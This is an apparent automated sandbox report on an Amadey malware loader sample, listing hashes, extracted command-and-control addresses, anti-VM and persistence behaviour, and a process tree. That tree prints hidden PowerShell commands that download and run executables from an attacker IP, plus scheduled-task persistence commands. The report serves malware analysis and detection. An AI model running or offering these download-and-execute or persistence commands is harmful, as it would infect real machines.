Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20250207-en -
resource tags
arch:x64arch:x86image:win10v2004-20250207-enlocale:en-usos:windows10-2004-x64system -
submitted
11-02-2025 17:19
Static task
static1
Behavioral task
behavioral1
Sample
581073aad7a20307a9d8b1ae25591204.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
581073aad7a20307a9d8b1ae25591204.exe
Resource
win10v2004-20250207-en
General
-
Target
581073aad7a20307a9d8b1ae25591204.exe
-
Size
2.1MB
-
MD5
581073aad7a20307a9d8b1ae25591204
-
SHA1
7a480497dcbf5a778a67a570507296190879d231
-
SHA256
10f74f3eb9a3efa714be7afa4503c6655f6502d3891497b96ce4418e0017f0f9
-
SHA512
0c9fee13c7723ba09449cbec55b88898ece66a53481250d84bd137cf8c972f5a2b3755bedf428595c43077d62fc3377626ee266c432988751f1f056c924d62ab
-
SSDEEP
49152:Lk9Akf6yHbZTZIR0i+vywkTzn2W+hWr2vI:Lk9FdTZxPaVN+hWivI
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Signatures
-
Amadey family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
description pid Process procid_target PID 2920 created 3488 2920 k6Sly2p.exe 56 PID 3120 created 3488 3120 k6Sly2p.exe 56 PID 4156 created 3488 4156 ftnhdax.exe 56 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 581073aad7a20307a9d8b1ae25591204.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 22 1440 powershell.exe 30 5464 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 1440 powershell.exe 5464 powershell.exe 3264 powershell.exe 3008 powershell.exe 2592 powershell.exe -
Downloads MZ/PE file 6 IoCs
flow pid Process 15 3892 skotes.exe 17 3892 skotes.exe 43 5616 Process not Found 22 1440 powershell.exe 30 5464 powershell.exe 56 3892 skotes.exe -
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 581073aad7a20307a9d8b1ae25591204.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 581073aad7a20307a9d8b1ae25591204.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-705198581-2062733989-3666524522-1000\Control Panel\International\Geo\Nation 581073aad7a20307a9d8b1ae25591204.exe Key value queried \REGISTRY\USER\S-1-5-21-705198581-2062733989-3666524522-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-705198581-2062733989-3666524522-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-705198581-2062733989-3666524522-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 12 IoCs
pid Process 3892 skotes.exe 2860 skotes.exe 2920 k6Sly2p.exe 2236 6881133ff7.exe 3120 k6Sly2p.exe 2612 k6Sly2p.exe 5484 k6Sly2p.exe 6128 skotes.exe 4156 ftnhdax.exe 2572 ftnhdax.exe 5456 skotes.exe 6012 ftnhdax.exe -
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-705198581-2062733989-3666524522-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-705198581-2062733989-3666524522-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-705198581-2062733989-3666524522-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-705198581-2062733989-3666524522-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-705198581-2062733989-3666524522-1000\Software\Wine 581073aad7a20307a9d8b1ae25591204.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-705198581-2062733989-3666524522-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6881133ff7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1075489001\\6881133ff7.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-705198581-2062733989-3666524522-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1075490021\\am_no.cmd" skotes.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000b000000023cf7-1328.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 2348 581073aad7a20307a9d8b1ae25591204.exe 3892 skotes.exe 2860 skotes.exe 6128 skotes.exe 5456 skotes.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2920 set thread context of 2612 2920 k6Sly2p.exe 119 PID 3120 set thread context of 5484 3120 k6Sly2p.exe 124 PID 4156 set thread context of 2572 4156 ftnhdax.exe 130 -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\Test Task17.job k6Sly2p.exe File created C:\Windows\Tasks\skotes.job 581073aad7a20307a9d8b1ae25591204.exe File created C:\Windows\Tasks\Test Task17.job k6Sly2p.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 26 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language k6Sly2p.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ftnhdax.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language k6Sly2p.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ftnhdax.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language k6Sly2p.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 581073aad7a20307a9d8b1ae25591204.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6881133ff7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language k6Sly2p.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3084 MicrosoftEdgeUpdate.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4668 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3916 schtasks.exe 5312 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 2348 581073aad7a20307a9d8b1ae25591204.exe 2348 581073aad7a20307a9d8b1ae25591204.exe 3892 skotes.exe 3892 skotes.exe 2860 skotes.exe 2860 skotes.exe 1440 powershell.exe 1440 powershell.exe 3264 powershell.exe 3264 powershell.exe 3008 powershell.exe 3008 powershell.exe 2592 powershell.exe 2592 powershell.exe 5464 powershell.exe 5464 powershell.exe 2920 k6Sly2p.exe 2920 k6Sly2p.exe 2920 k6Sly2p.exe 3120 k6Sly2p.exe 3120 k6Sly2p.exe 3120 k6Sly2p.exe 6128 skotes.exe 6128 skotes.exe 4156 ftnhdax.exe 4156 ftnhdax.exe 4156 ftnhdax.exe 5456 skotes.exe 5456 skotes.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 2920 k6Sly2p.exe Token: SeDebugPrivilege 1440 powershell.exe Token: SeDebugPrivilege 3264 powershell.exe Token: SeDebugPrivilege 3120 k6Sly2p.exe Token: SeDebugPrivilege 3008 powershell.exe Token: SeDebugPrivilege 2592 powershell.exe Token: SeDebugPrivilege 5464 powershell.exe Token: SeDebugPrivilege 2920 k6Sly2p.exe Token: SeDebugPrivilege 3120 k6Sly2p.exe Token: SeDebugPrivilege 4156 ftnhdax.exe Token: SeDebugPrivilege 4156 ftnhdax.exe Token: SeDebugPrivilege 6012 ftnhdax.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2348 581073aad7a20307a9d8b1ae25591204.exe 2236 6881133ff7.exe 2236 6881133ff7.exe 2236 6881133ff7.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2236 6881133ff7.exe 2236 6881133ff7.exe 2236 6881133ff7.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2348 wrote to memory of 3892 2348 581073aad7a20307a9d8b1ae25591204.exe 89 PID 2348 wrote to memory of 3892 2348 581073aad7a20307a9d8b1ae25591204.exe 89 PID 2348 wrote to memory of 3892 2348 581073aad7a20307a9d8b1ae25591204.exe 89 PID 3892 wrote to memory of 2920 3892 skotes.exe 91 PID 3892 wrote to memory of 2920 3892 skotes.exe 91 PID 3892 wrote to memory of 2920 3892 skotes.exe 91 PID 3892 wrote to memory of 2236 3892 skotes.exe 92 PID 3892 wrote to memory of 2236 3892 skotes.exe 92 PID 3892 wrote to memory of 2236 3892 skotes.exe 92 PID 2236 wrote to memory of 1148 2236 6881133ff7.exe 93 PID 2236 wrote to memory of 1148 2236 6881133ff7.exe 93 PID 2236 wrote to memory of 1148 2236 6881133ff7.exe 93 PID 2236 wrote to memory of 1236 2236 6881133ff7.exe 94 PID 2236 wrote to memory of 1236 2236 6881133ff7.exe 94 PID 2236 wrote to memory of 1236 2236 6881133ff7.exe 94 PID 1148 wrote to memory of 3916 1148 cmd.exe 97 PID 1148 wrote to memory of 3916 1148 cmd.exe 97 PID 1148 wrote to memory of 3916 1148 cmd.exe 97 PID 1236 wrote to memory of 1440 1236 mshta.exe 100 PID 1236 wrote to memory of 1440 1236 mshta.exe 100 PID 1236 wrote to memory of 1440 1236 mshta.exe 100 PID 3892 wrote to memory of 1476 3892 skotes.exe 102 PID 3892 wrote to memory of 1476 3892 skotes.exe 102 PID 3892 wrote to memory of 1476 3892 skotes.exe 102 PID 1476 wrote to memory of 1360 1476 cmd.exe 104 PID 1476 wrote to memory of 1360 1476 cmd.exe 104 PID 1476 wrote to memory of 1360 1476 cmd.exe 104 PID 1360 wrote to memory of 4668 1360 cmd.exe 106 PID 1360 wrote to memory of 4668 1360 cmd.exe 106 PID 1360 wrote to memory of 4668 1360 cmd.exe 106 PID 1360 wrote to memory of 1108 1360 cmd.exe 107 PID 1360 wrote to memory of 1108 1360 cmd.exe 107 PID 1360 wrote to memory of 1108 1360 cmd.exe 107 PID 1108 wrote to memory of 3264 1108 cmd.exe 108 PID 1108 wrote to memory of 3264 1108 cmd.exe 108 PID 1108 wrote to memory of 3264 1108 cmd.exe 108 PID 3892 wrote to memory of 3120 3892 skotes.exe 109 PID 3892 wrote to memory of 3120 3892 skotes.exe 109 PID 3892 wrote to memory of 3120 3892 skotes.exe 109 PID 1360 wrote to memory of 552 1360 cmd.exe 110 PID 1360 wrote to memory of 552 1360 cmd.exe 110 PID 1360 wrote to memory of 552 1360 cmd.exe 110 PID 552 wrote to memory of 3008 552 cmd.exe 111 PID 552 wrote to memory of 3008 552 cmd.exe 111 PID 552 wrote to memory of 3008 552 cmd.exe 111 PID 1360 wrote to memory of 3224 1360 cmd.exe 112 PID 1360 wrote to memory of 3224 1360 cmd.exe 112 PID 1360 wrote to memory of 3224 1360 cmd.exe 112 PID 3224 wrote to memory of 2592 3224 cmd.exe 113 PID 3224 wrote to memory of 2592 3224 cmd.exe 113 PID 3224 wrote to memory of 2592 3224 cmd.exe 113 PID 1360 wrote to memory of 5312 1360 cmd.exe 114 PID 1360 wrote to memory of 5312 1360 cmd.exe 114 PID 1360 wrote to memory of 5312 1360 cmd.exe 114 PID 1360 wrote to memory of 5340 1360 cmd.exe 115 PID 1360 wrote to memory of 5340 1360 cmd.exe 115 PID 1360 wrote to memory of 5340 1360 cmd.exe 115 PID 5340 wrote to memory of 5464 5340 mshta.exe 116 PID 5340 wrote to memory of 5464 5340 mshta.exe 116 PID 5340 wrote to memory of 5464 5340 mshta.exe 116 PID 2920 wrote to memory of 2612 2920 k6Sly2p.exe 119 PID 2920 wrote to memory of 2612 2920 k6Sly2p.exe 119 PID 2920 wrote to memory of 2612 2920 k6Sly2p.exe 119 PID 2920 wrote to memory of 2612 2920 k6Sly2p.exe 119
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3488
-
C:\Users\Admin\AppData\Local\Temp\581073aad7a20307a9d8b1ae25591204.exe"C:\Users\Admin\AppData\Local\Temp\581073aad7a20307a9d8b1ae25591204.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Users\Admin\AppData\Local\Temp\1075350001\k6Sly2p.exe"C:\Users\Admin\AppData\Local\Temp\1075350001\k6Sly2p.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2920
-
-
C:\Users\Admin\AppData\Local\Temp\1075489001\6881133ff7.exe"C:\Users\Admin\AppData\Local\Temp\1075489001\6881133ff7.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 2oG7gma1Sbc /tr "mshta C:\Users\Admin\AppData\Local\Temp\TMaNfSmAl.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 2oG7gma1Sbc /tr "mshta C:\Users\Admin\AppData\Local\Temp\TMaNfSmAl.hta" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3916
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\TMaNfSmAl.hta5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1236 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'3HTNNLUMSJU6RPCANSJYJSJ2JG2JK8YS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1440
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1075490021\am_no.cmd" "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1476 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1075490021\am_no.cmd" any_word5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Windows\SysWOW64\timeout.exetimeout /t 26⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4668
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3264
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:552 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3224 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2592
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "hAcztmaxkR3" /tr "mshta \"C:\Temp\1cMRTi6vO.hta\"" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5312
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\1cMRTi6vO.hta"6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5340 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5464
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1075515001\k6Sly2p.exe"C:\Users\Admin\AppData\Local\Temp\1075515001\k6Sly2p.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3120
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1075350001\k6Sly2p.exe"C:\Users\Admin\AppData\Local\Temp\1075350001\k6Sly2p.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2612
-
-
C:\Users\Admin\AppData\Local\Temp\1075515001\k6Sly2p.exe"C:\Users\Admin\AppData\Local\Temp\1075515001\k6Sly2p.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5484
-
-
C:\ProgramData\acfjpea\ftnhdax.exe"C:\ProgramData\acfjpea\ftnhdax.exe"2⤵
- Executes dropped EXE
PID:2572
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2860
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QTY5Qjc2OEEtMjJCQy00OTAyLUFGQjEtODJBMEIyNzE1OEE3fSIgdXNlcmlkPSJ7RjJCN0Y1NjQtREI4RS00OUYwLTkwQTEtQjUwMjkyOERCMzg4fSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7M0UzQzUwNzUtNEM4My00N0M5LTlBNDgtQkEyNUE2RTc0ODhEfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSI0IiBpbnN0YWxsZGF0ZXRpbWU9IjE3Mzg5NDU4NjAiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4MzQxODIxNjMwOTAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1MzA4MTc0NzQ5Ii8-PC9hcHA-PC9yZXF1ZXN0Pg1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:3084
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6128
-
C:\ProgramData\acfjpea\ftnhdax.exeC:\ProgramData\acfjpea\ftnhdax.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4156
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5456
-
C:\ProgramData\acfjpea\ftnhdax.exeC:\ProgramData\acfjpea\ftnhdax.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6012
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
782B
MD516d76e35baeb05bc069a12dce9da83f9
SHA1f419fd74265369666595c7ce7823ef75b40b2768
SHA256456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7
SHA5124063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e
-
Filesize
1KB
MD56195a91754effb4df74dbc72cdf4f7a6
SHA1aba262f5726c6d77659fe0d3195e36a85046b427
